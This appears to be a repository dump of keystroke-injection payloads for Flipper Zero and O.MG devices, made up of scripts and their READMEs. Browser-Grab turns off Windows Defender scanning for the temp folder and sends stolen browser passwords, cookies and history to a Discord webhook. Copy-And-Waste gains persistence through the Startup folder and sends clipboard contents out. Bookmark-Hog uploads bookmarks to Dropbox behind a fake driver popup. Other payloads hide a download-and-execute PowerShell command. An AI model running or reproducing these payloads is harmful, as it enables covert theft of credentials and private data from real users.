    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Water-UnMark\n\nA payload to get rid of the ugly windows activation watermark.\n\n## Description\nThis script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\n\n## Getting Started\n\n### Dependencies\n\n* Unactivated Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Water-UnMark/payload.txt",
    "content": "REM Title:       Water-UnMark\r\nREM Author:      atomiczsec\r\nREM Target OS:   Windows 10\r\nREM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!\r\nDELAY 2000\r\nGUI r\r\nDELAY 100\r\nSTRING powershell Start-Process powershell -verb runAs\r\nDELAY 1000\r\nALT Y\r\nDELAY 1000\r\nSTRING Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\svsvc\" -Name Start -Value 4 -Force\r\nENTER\r\nDELAY 100\r\nSTRING Restart-Computer -Force\r\nENTER\r\n"
  },
  {
    "path": "FlipperZero/payloads/Water-UnMark/placeholder",
    "content": "\n"
  },
  {
    "path": "FlipperZero/payloads/cApS-Troll/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# cApS-Troll\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Description\n\nThis payload is meant to prank your victim with TURNING on AND off CAPS LOCK\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Define the `DEFINE TARGET_URL example.com`\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/cApS-Troll/a.ps1",
    "content": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep -Second 15\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\n} \r\n"
  },
  {
    "path": "FlipperZero/payloads/cApS-Troll/payload.txt",
    "content": "REM     Title: cApS-Troll\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "Functions/placeholder",
    "content": "\n"
  },
  {
    "path": "Functions/tidal-log.ps1",
    "content": "# Define the Discord webhook URL\n$webhookUrl = \"https://discord.com/api/webhooks/XXXXXXX\"\n\n# Define the path to the app.log file\r\n$appLogPath = \"$env:USERPROFILE\\AppData\\Roaming\\TIDAL\\Logs\\app.log\"\r\n\r\n# Check if the file exists\r\nif (Test-Path $appLogPath) {\r\n    try {\r\n        # Use curl to upload the file to the Discord webhook\r\n        $curlCommand = \"curl.exe -F 'file1=@$appLogPath' $webhookUrl\"\r\n        Invoke-Expression $curlCommand\r\n        Write-Host \"Successfully uploaded the log file to the Discord webhook.\"\r\n    } catch {\r\n        Write-Host \"An error occurred while uploading the log file to the Discord webhook: $_\"\r\n    }\r\n} else {\r\n    Write-Host \"The file $appLogPath does not exist.\"\r\n}"
  },
  {
    "path": "OMG/payloads/Bookmark-Hog/BH.ps1",
    "content": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The chrome bookmark file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The edge bookmark file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR ACCESS TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "OMG/payloads/Bookmark-Hog/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Bookmark-Hog\n\nA payload to exfiltrate bookmarks of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the bookmark history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Bookmark-Hog/payload.txt",
    "content": "REM     Title: Bookmark-Hog\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate bookmarks to the rubber ducky\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/Bookmark-Hog/placeholder",
    "content": "\n"
  },
  {
    "path": "OMG/payloads/Browser-Grab/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Browser-Grab\n\nA payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\n\n## Description\n\nThis payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe\nThis payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nFinally, discord will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Admin privileges on the Device you are targeting\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Browser-Grab/b.ps1",
    "content": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n    [parameter(Position=0,Mandatory=$False)]\n    [string]$file,\n    [parameter(Position=1,Mandatory=$False)]\n    [string]$text \n)\n\n$hookurl = 'YOUR-DISCORD-WEBHOOK'\n\n$Body = @{\n  'username' = $env:username\n  'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\n\n\n# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download\nAdd-MpPreference -ExclusionPath $env:tmp\n\n# Download the exe and save it to temp directory\niwr \"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true\" -outfile \"$env:tmp\\browser.exe\"\n\n# Execute the Browser Stealer\ncd $env:tmp;Start-Process -FilePath \"$env:tmp\\browser.exe\" -WindowStyle h -Wait\n\n# Exfiltrate the loot to discord\nCompress-Archive -Path \"$env:tmp\\results\" -DestinationPath $env:tmp\\browserdata.zip\nUpload-Discord -file \"$env:tmp\\browserdata.zip\"\n"
  },
  {
    "path": "OMG/payloads/Browser-Grab/payload.txt",
    "content": "REM     Title: Browser-Grab\nREM     Author: atomiczsec\nREM     Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nREM     Target: Windows 10\n\nDELAY 2000\nGUI r \nDELAY 1000\nSTRING powershell saps powershell -verb runas\nENTER\nDELAY 1000\nALT y\nDELAY 1000\nSTRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex\nENTER\n\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly"
  },
  {
    "path": "OMG/payloads/Copy-And-Waste/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "OMG/payloads/Copy-And-Waste/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Copy-And-Waste\n\nA payload to exfiltrate clipboard contents\n\n## Description\n\nThis payload uses iwr to download 2 files \n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, waiting for a Ctrl + C or Ctrl + X click \n\nThen the contents will then be sent to the discord webhook for viewing pleasure\n\nFor killing the script press both Ctrl buttons at the same time [It will resume at reboot]\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Copy-And-Waste/c.ps1",
    "content": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n  [CmdletBinding()]\r\n  param (    \r\n  [Parameter (Position=0,Mandatory = $True)]\r\n  [string]$con\r\n  ) \r\n  \r\n  $hookUrl = 'YOUR DISCORD WEBHOOK'\r\n  \r\n$Body = @{\r\n  'username' = $env:username\r\n  'content' = $con\r\n}\r\n\r\n\r\nInvoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body\r\n\r\n}\r\n\r\n\r\ndischat (get-clipboard)\r\n\r\nwhile (1){\r\n    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')\r\n    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)\r\n    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)\r\n    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)\r\n\r\n       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}\r\n       elseif ($Rctrl -and $Lctrl) {dischat \"---------connection lost----------\";exit}\r\n       else {continue}\r\n} "
  },
  {
    "path": "OMG/payloads/Copy-And-Waste/payload.txt",
    "content": "REM     Title: Copy-And-Waste\r\n\r\nREM     Author: atomiczsec & I am Jakoby\r\n\r\nREM     Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "OMG/payloads/Copy-And-Waste/placeholder",
    "content": "\n"
  },
  {
    "path": "OMG/payloads/De-Bloater/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# De-Bloater\n\nA payload to quickly get \"Windows10Debloater\"\n\n## Description\nThis script will download \"Windows10Debloater\" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\niwr -useb https://git.io/debloat|iex\n```\n\n<p 